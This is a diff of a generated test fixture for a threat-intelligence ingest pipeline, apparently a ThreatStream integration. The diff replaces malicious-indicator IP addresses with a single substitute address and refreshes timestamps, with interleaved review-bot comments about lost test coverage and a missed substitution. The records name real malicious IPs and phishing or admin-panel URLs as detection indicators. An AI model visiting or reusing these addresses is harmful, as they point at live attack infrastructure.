@@ -19284,12 +19284,12 @@ "first_seen": "2020-02-08T14:02:59.310Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "81.4.100.75" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386887337Z", - "original": "{\"created\":\"2020-02-08T14:02:59.31Z\",\"description\":\"TS ID: 55298071076; iType: mal_ip; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime\",\"id\":\"indicator--d74f403a-0673-4594-a4fc-61a22ab7fa21\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-02-08T14:02:59.31Z\",\"name\":\"mal_ip: 81.4.100.75\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '81.4.100.75']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.31Z\"}", + "ingested": "2021-12-13T08:38:40.024954500Z", + "original": "{\"created\":\"2020-02-08T14:02:59.31Z\",\"description\":\"TS ID: 55298071076; iType: mal_ip; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime\",\"id\":\"indicator--d74f403a-0673-4594-a4fc-61a22ab7fa21\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-02-08T14:02:59.31Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.31Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19307,7 +19307,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 8.209.78.16", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55298069175; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime", "modified": "2020-02-08T14:02:59.432Z", "valid_from": "2020-02-08T14:02:59.432Z", 
@@ -19329,12 +19329,12 @@ "first_seen": "2020-02-08T14:02:59.432Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "8.209.78.16" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386892537Z", - "original": "{\"created\":\"2020-02-08T14:02:59.432Z\",\"description\":\"TS ID: 55298069175; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--3cac5b3d-ffa6-4f5c-b190-7de9eb2e5a00\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-08T14:02:59.432Z\",\"name\":\"mal_ip: 8.209.78.16\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '8.209.78.16']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.432Z\"}", + "ingested": "2021-12-13T08:38:40.024960200Z", + "original": "{\"created\":\"2020-02-08T14:02:59.432Z\",\"description\":\"TS ID: 55298069175; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--3cac5b3d-ffa6-4f5c-b190-7de9eb2e5a00\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-08T14:02:59.432Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.432Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -19385,7 +19385,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386897556Z", + "ingested": "2021-12-13T08:38:40.024968Z", "original": "{\"created\":\"2020-02-08T14:03:17.953Z\",\"description\":\"TS ID: 55298072311; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--86c43dc8-a27e-4f30-a29e-ba174f0a03ef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-08T14:03:17.953Z\",\"name\":\"mal_url: http://bacanacabana.com.br/wp-includes/css/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bacanacabana.com.br/wp-includes/css/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:17.953Z\"}", "category": "threat", "type": "indicator", @@ -19437,7 +19437,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386902776Z", + "ingested": "2021-12-13T08:38:40.024991900Z", "original": "{\"created\":\"2020-02-08T14:03:21.626Z\",\"description\":\"TS ID: 55298071960; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--d900b770-4f2f-4597-ba97-a3e62646eca8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-08T14:03:21.626Z\",\"name\":\"mal_url: http://xgkxc.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xgkxc.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:21.626Z\"}", "category": "threat", "type": "indicator", 
@@ -19488,7 +19488,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386907545Z", + "ingested": "2021-12-13T08:38:40.024996400Z", "original": "{\"created\":\"2020-02-08T14:03:23.941Z\",\"description\":\"TS ID: 55298070427; iType: mal_url; State: active; Org: SBCLOUD; Source: CyberCrime\",\"id\":\"indicator--be5fb697-b554-4042-8185-f4148a5d02a2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-08T14:03:23.941Z\",\"name\":\"mal_url: http://boomcoins.ml/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://boomcoins.ml/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:23.941Z\"}", "category": "threat", "type": "indicator", @@ -19539,7 +19539,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386912144Z", + "ingested": "2021-12-13T08:38:40.025001600Z", "original": "{\"created\":\"2020-02-08T14:03:34.136Z\",\"description\":\"TS ID: 55298071042; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime\",\"id\":\"indicator--31a6a6c3-f385-421f-9ebb-d5cdced1dfd5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-02-08T14:03:34.136Z\",\"name\":\"mal_url: http://asstubevideos.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://asstubevideos.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:34.136Z\"}", "category": "threat", "type": "indicator", 
@@ -19590,7 +19590,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.386916672Z",
+ "ingested": "2021-12-13T08:38:40.025025700Z",
"original": "{\"created\":\"2020-02-08T14:03:34.507Z\",\"description\":\"TS ID: 55298069289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--8c9846cd-2a0b-40c3-91f2-5893c05b1560\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-08T14:03:34.507Z\",\"name\":\"mal_url: http://f0397413.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0397413.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:34.507Z\"}",
"category": "threat",
"type": "indicator",
@@ -19609,7 +19609,7 @@
"object_marking_refs": [
"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
],
- "name": "mal_ip: 45.145.0.14",
+ "name": "mal_ip: 89.160.20.156",
"description": "TS ID: 55298071476; iType: mal_ip; State: active; Source: CyberCrime",
"modified": "2020-02-08T14:03:42.075Z",
"valid_from": "2020-02-08T14:03:42.075Z",
@@ -19631,12 +19631,12 @@
"first_seen": "2020-02-08T14:03:42.075Z",
"type": "ipv4-addr",
"provider": "CyberCrime",
- "ip": "45.145.0.14"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.386921040Z",
- "original": "{\"created\":\"2020-02-08T14:03:42.075Z\",\"description\":\"TS ID: 55298071476; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--4e5ac673-3459-45d1-817e-d7aca2850c5e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:03:42.075Z\",\"name\":\"mal_ip: 45.145.0.14\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '45.145.0.14']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:42.075Z\"}",
+ "ingested": "2021-12-13T08:38:40.025032100Z",
+ "original": "{\"created\":\"2020-02-08T14:03:42.075Z\",\"description\":\"TS ID: 55298071476; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--4e5ac673-3459-45d1-817e-d7aca2850c5e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:03:42.075Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:42.075Z\"}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
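Review bot: Every `mal_ip` indicator in this section now carries the same value, `89.160.20.156` — this hunk plus the ones at `@@ -20140`, `@@ -20391`, `@@ -20642` and `@@ -20997` — and the `mal_url` hosts at `@@ -20291`, `@@ -20438` and `@@ -20844` reuse it too, where the old fixture had eight distinct addresses. The expected output still matches the pipeline, but the fixture no longer demonstrates that `threat.indicator.ip`, `url.domain` and the STIX `pattern` are carried through independently per event; if anything downstream of this test keys on indicator value (dedup, indicator-match), that is now untested here. If the supported subset offers more than one address, spreading the events across a few of them would keep that coverage; a one-line comment in the test input (not this generated file) stating why the addresses are synthetic would also help the next regeneration.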
@@ -19686,7 +19686,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.386925479Z",
+ "ingested": "2021-12-13T08:38:40.025036400Z",
"original": "{\"created\":\"2020-02-08T14:03:42.298Z\",\"description\":\"TS ID: 55298069324; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--8d463a9a-c285-4af6-91e8-bfd7e65d820f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-08T14:03:42.298Z\",\"name\":\"mal_url: http://f0396512.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0396512.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:42.298Z\"}",
"category": "threat",
"type": "indicator",
@@ -19737,7 +19737,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.386929827Z",
+ "ingested": "2021-12-13T08:38:40.025042Z",
"original": "{\"created\":\"2020-02-08T14:03:46.901Z\",\"description\":\"TS ID: 55298070290; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--bf76b431-6b24-4b63-89d6-4f026a2e5169\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-63\"],\"modified\":\"2020-02-08T14:03:46.901Z\",\"name\":\"mal_url: http://j1043204.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j1043204.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:46.901Z\"}",
"category": "threat",
"type": "indicator",
@@ -19788,7 +19788,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.386934365Z",
+ "ingested": "2021-12-13T08:38:40.025049400Z",
"original": "{\"created\":\"2020-02-08T14:03:47.108Z\",\"description\":\"TS ID: 55298069358; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--646c9b00-80f7-4457-b2bc-1da854c211d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-08T14:03:47.108Z\",\"name\":\"mal_url: http://f0387320.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387320.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:47.108Z\"}",
"category": "threat",
"type": "indicator",
@@ -19840,7 +19840,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.386938914Z",
+ "ingested": "2021-12-13T08:38:40.025054100Z",
"original": "{\"created\":\"2020-02-08T14:03:50.674Z\",\"description\":\"TS ID: 55298072749; iType: mal_url; State: active; Org: SpaceWeb CJSC; Source: CyberCrime\",\"id\":\"indicator--48ad83a8-cec1-4d85-a9fd-1b7f9308cb6a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-08T14:03:50.674Z\",\"name\":\"mal_url: http://rqx10504bc.temp.swtest.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rqx10504bc.temp.swtest.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:50.674Z\"}",
"category": "threat",
"type": "indicator",
@@ -19892,7 +19892,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.386943152Z",
+ "ingested": "2021-12-13T08:38:40.025058900Z",
"original": "{\"created\":\"2020-02-08T14:03:53.621Z\",\"description\":\"TS ID: 55298069555; iType: mal_url; State: active; Org: OOO Network of data-centers Selectel; Source: CyberCrime\",\"id\":\"indicator--8e98212b-20f2-404f-804b-8ab7519c5683\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-08T14:03:53.621Z\",\"name\":\"mal_url: http://j6g3fzp.5k5.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j6g3fzp.5k5.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:53.621Z\"}",
"category": "threat",
"type": "indicator",
@@ -19943,7 +19943,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387867657Z",
+ "ingested": "2021-12-13T08:38:40.025062500Z",
"original": "{\"created\":\"2020-02-08T14:03:58.176Z\",\"description\":\"TS ID: 55298069681; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--395e83ba-96c1-45d2-b4b2-c065af5547fe\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:03:58.176Z\",\"name\":\"mal_url: http://stableupdater.ru.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://stableupdater.ru.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:58.176Z\"}",
"category": "threat",
"type": "indicator",
@@ -19995,7 +19995,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387882415Z",
+ "ingested": "2021-12-13T08:38:40.025067500Z",
"original": "{\"created\":\"2020-02-08T14:03:58.41Z\",\"description\":\"TS ID: 55298072652; iType: mal_url; State: active; Org: Netrouting; Source: CyberCrime\",\"id\":\"indicator--84dceb2a-fb38-4d98-9005-7f05460e8f3a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-48\"],\"modified\":\"2020-02-08T14:03:58.41Z\",\"name\":\"mal_url: http://209.182.217.85/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://209.182.217.85/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:58.41Z\"}",
"category": "threat",
"type": "indicator",
@@ -20047,7 +20047,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387889298Z",
+ "ingested": "2021-12-13T08:38:40.025074900Z",
"original": "{\"created\":\"2020-02-08T14:04:30.627Z\",\"description\":\"TS ID: 55298073012; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--ca97a773-4de3-4c9d-8f4c-b7350a615c45\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-08T14:04:30.627Z\",\"name\":\"mal_url: http://fentq.org/x/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fentq.org/x/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.627Z\"}",
"category": "threat",
"type": "indicator",
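Review bot: The first hunk here (`@@ -19995`) leaves `mal_url: http://209.182.217.85/auth.php` untouched in the `event.original` context line, while the other IP-hosted `mal_url` indicators in this section (`@@ -20267`, `@@ -20414`, `@@ -20819`) were rewritten to `89.160.20.156`. That looks like a miss in the same substitution rather than an intentional exception; the event's `threat.indicator.url.domain` is outside this hunk, so I cannot confirm from the diff whether it still carries the old address, but if it does this fixture still contains one public IP outside the supported subset. Replacing the address in the test input for this event and regenerating would make the change consistent with the commit description.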
@@ -20099,7 +20099,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387894848Z",
+ "ingested": "2021-12-13T08:38:40.025082200Z",
"original": "{\"created\":\"2020-02-08T14:04:30.659Z\",\"description\":\"TS ID: 55298072708; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--d0653208-3d17-48c8-a47d-a6dede383ad8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-08T14:04:30.659Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/beta/aps/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/beta/aps/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.659Z\"}",
"category": "threat",
"type": "indicator",
@@ -20118,7 +20118,7 @@
"object_marking_refs": [
"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
],
- "name": "mal_ip: 162.241.6.97",
+ "name": "mal_ip: 89.160.20.156",
"description": "TS ID: 55298072377; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime",
"modified": "2020-02-08T14:04:30.733Z",
"valid_from": "2020-02-08T14:04:30.733Z",
@@ -20140,12 +20140,12 @@
"first_seen": "2020-02-08T14:04:30.733Z",
"type": "ipv4-addr",
"provider": "CyberCrime",
- "ip": "162.241.6.97"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387901621Z",
- "original": "{\"created\":\"2020-02-08T14:04:30.733Z\",\"description\":\"TS ID: 55298072377; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--7873494f-24fb-42a6-ae17-299b9825e220\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-22\"],\"modified\":\"2020-02-08T14:04:30.733Z\",\"name\":\"mal_ip: 162.241.6.97\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '162.241.6.97']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.733Z\"}",
+ "ingested": "2021-12-13T08:38:40.025089500Z",
+ "original": "{\"created\":\"2020-02-08T14:04:30.733Z\",\"description\":\"TS ID: 55298072377; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--7873494f-24fb-42a6-ae17-299b9825e220\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-22\"],\"modified\":\"2020-02-08T14:04:30.733Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.733Z\"}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -20196,7 +20196,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387923843Z",
+ "ingested": "2021-12-13T08:38:40.025096700Z",
"original": "{\"created\":\"2020-02-08T14:04:30.81Z\",\"description\":\"TS ID: 55298072245; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--14e760f3-eb76-412c-ab7b-8267bd65deb5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-08T14:04:30.81Z\",\"name\":\"mal_url: http://hanmha.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://hanmha.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.81Z\"}",
"category": "threat",
"type": "indicator",
@@ -20248,7 +20248,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387930125Z",
+ "ingested": "2021-12-13T08:38:40.025103900Z",
"original": "{\"created\":\"2020-02-08T14:04:30.84Z\",\"description\":\"TS ID: 55298072104; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--8a5aa5ab-e8ec-4641-9cfb-179df3bede39\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-08T14:04:30.84Z\",\"name\":\"mal_url: http://trouserlanditd.com/dabs/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trouserlanditd.com/dabs/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.84Z\"}",
"category": "threat",
"type": "indicator",
@@ -20267,7 +20267,7 @@
"object_marking_refs": [
"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
],
- "name": "mal_url: http://45.145.0.14/login",
+ "name": "mal_url: http://89.160.20.156/login",
"description": "TS ID: 55298071479; iType: mal_url; State: active; Source: CyberCrime",
"modified": "2020-02-08T14:04:30.927Z",
"valid_from": "2020-02-08T14:04:30.927Z",
@@ -20291,16 +20291,16 @@
"provider": "CyberCrime",
"url": {
"path": "/login",
- "original": "http://45.145.0.14/login",
+ "original": "http://89.160.20.156/login",
"scheme": "http",
- "domain": "45.145.0.14",
- "full": "http://45.145.0.14/login"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156/login"
}
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387935565Z",
- "original": "{\"created\":\"2020-02-08T14:04:30.927Z\",\"description\":\"TS ID: 55298071479; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--5bbb8e55-9eb7-4b8a-a7aa-d79c53a0e596\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:04:30.927Z\",\"name\":\"mal_url: http://45.145.0.14/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://45.145.0.14/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.927Z\"}",
+ "ingested": "2021-12-13T08:38:40.025111Z",
+ "original": "{\"created\":\"2020-02-08T14:04:30.927Z\",\"description\":\"TS ID: 55298071479; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--5bbb8e55-9eb7-4b8a-a7aa-d79c53a0e596\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:04:30.927Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:30.927Z\"}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -20350,7 +20350,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387940654Z",
+ "ingested": "2021-12-13T08:38:40.025118600Z",
"original": "{\"created\":\"2020-02-08T14:04:35.541Z\",\"description\":\"TS ID: 55298071733; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--cd3bea2d-dd64-463e-ae03-2a582c2261f2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-02-08T14:04:35.541Z\",\"name\":\"mal_url: http://trust-oot.info/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trust-oot.info/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:35.541Z\"}",
"category": "threat",
"type": "indicator",
@@ -20369,7 +20369,7 @@
"object_marking_refs": [
"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
],
- "name": "mal_ip: 217.8.117.66",
+ "name": "mal_ip: 89.160.20.156",
"description": "TS ID: 55298069948; iType: mal_ip; State: active; Source: CyberCrime",
"modified": "2020-02-08T14:04:35.641Z",
"valid_from": "2020-02-08T14:04:35.641Z",
@@ -20391,12 +20391,12 @@
"first_seen": "2020-02-08T14:04:35.641Z",
"type": "ipv4-addr",
"provider": "CyberCrime",
- "ip": "217.8.117.66"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387945534Z",
- "original": "{\"created\":\"2020-02-08T14:04:35.641Z\",\"description\":\"TS ID: 55298069948; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--543aeaab-e5f0-42bc-afa5-6cd3cc9a26ec\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-08T14:04:35.641Z\",\"name\":\"mal_ip: 217.8.117.66\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '217.8.117.66']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:35.641Z\"}",
+ "ingested": "2021-12-13T08:38:40.025125700Z",
+ "original": "{\"created\":\"2020-02-08T14:04:35.641Z\",\"description\":\"TS ID: 55298069948; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--543aeaab-e5f0-42bc-afa5-6cd3cc9a26ec\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-08T14:04:35.641Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:35.641Z\"}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -20414,7 +20414,7 @@
"object_marking_refs": [
"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
],
- "name": "mal_url: http://81.4.100.75/login",
+ "name": "mal_url: http://89.160.20.156/login",
"description": "TS ID: 55298071095; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime",
"modified": "2020-02-08T14:04:37.657Z",
"valid_from": "2020-02-08T14:04:37.657Z",
